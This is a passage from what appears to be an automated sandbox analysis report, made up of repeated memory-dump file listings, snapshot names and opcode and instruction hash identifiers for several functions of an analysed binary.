                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                    • Instruction ID: 3d798332d00412e4f2586ac7d505df7e22e169d2b07526189d3d079189d8d708
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F011087B20114247D604872DC9F49F6A79EEAC5329B3C437AD0414B75BDE3BD9C5D900
                                                                                                                                                                                                                                                    Function 00B87A7E Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 005fc1e89ad8046cb66553ad26529b0220711176b778c1b0acff5063d825a8c0
                                                                                                                                                                                                                                                    • Instruction ID: 8ca20ae4133e20a9429d1dded1ecceb602697ae565d3e229dd0fa31510b7e6f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 005fc1e89ad8046cb66553ad26529b0220711176b778c1b0acff5063d825a8c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B1169B7F1162447F3984C68CCA93B66102EB95324F2F827D8F2AAB7C5CC6D9D056384
                                                                                                                                                                                                                                                    Function 00AAA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                    • Instruction ID: bebf7f71a6327cff48772cbda625a98eb2eae92116f83ae07cc5ef50435f4542
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E0B672925228FBCB25DBD88A44D9AF2ECEB4AB50F554596B501D3291C370DF00C7D1
                                                                                                                                                                                                                                                    Function 00A72E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 57040152-0
                                                                                                                                                                                                                                                    • Opcode ID: 1d434d33009066e72d3e15957e1acab46dedfa7da93d8221247acacb619cc640
                                                                                                                                                                                                                                                    • Instruction ID: 4ae3085dc1efed3d6f7a2ef5fae90f3940bb6090ff4701d77a4930bc8c37e8e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d434d33009066e72d3e15957e1acab46dedfa7da93d8221247acacb619cc640
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AA1B0B1A01205AFDF11EB64CD44BAAB7B8FF15324F44C639E819D7241EB35EA14CBA1
                                                                                                                                                                                                                                                    Function 00AAC9B0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
